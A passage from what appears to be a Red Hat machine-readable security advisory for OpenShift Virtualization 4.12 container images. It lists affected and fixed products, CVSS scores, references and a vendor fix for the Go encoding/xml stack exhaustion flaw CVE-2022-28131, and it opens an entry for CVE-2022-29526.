"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2107390", }, ], notes: [ { category: "description", text: "A flaw was found in golang encoding/xml. When calling Decoder, Skip while parsing a deeply nested XML document, a panic can occur due to stack exhaustion and allows an attacker to impact system availability.", title: "Vulnerability description", }, { category: "summary", text: "golang: encoding/xml: stack exhaustion in Decoder.Skip", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-28131", }, { category: "external", summary: "RHBZ#2107390", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107390", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-28131", url: "https://www.cve.org/CVERecord?id=CVE-2022-28131", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-28131", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-28131", }, { category: "external", summary: "https://go.dev/issue/53614", url: "https://go.dev/issue/53614", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", url: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", }, ], release_date: "2022-07-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "LOCAL", availabilityImpact: "HIGH", baseScore: 7.3, baseSeverity: "HIGH", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: encoding/xml: stack exhaustion in Decoder.Skip", }, { acknowledgments: [ { names: [ "Joël Gähwiler", ], summary: "Acknowledged by upstream.", }, ], cve: "CVE-2022-29526", cwe: { id: "CWE-280", name: "Improper Handling of Insufficient Permissions or Privileges ", }, discovery_date: "2022-05-11T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", 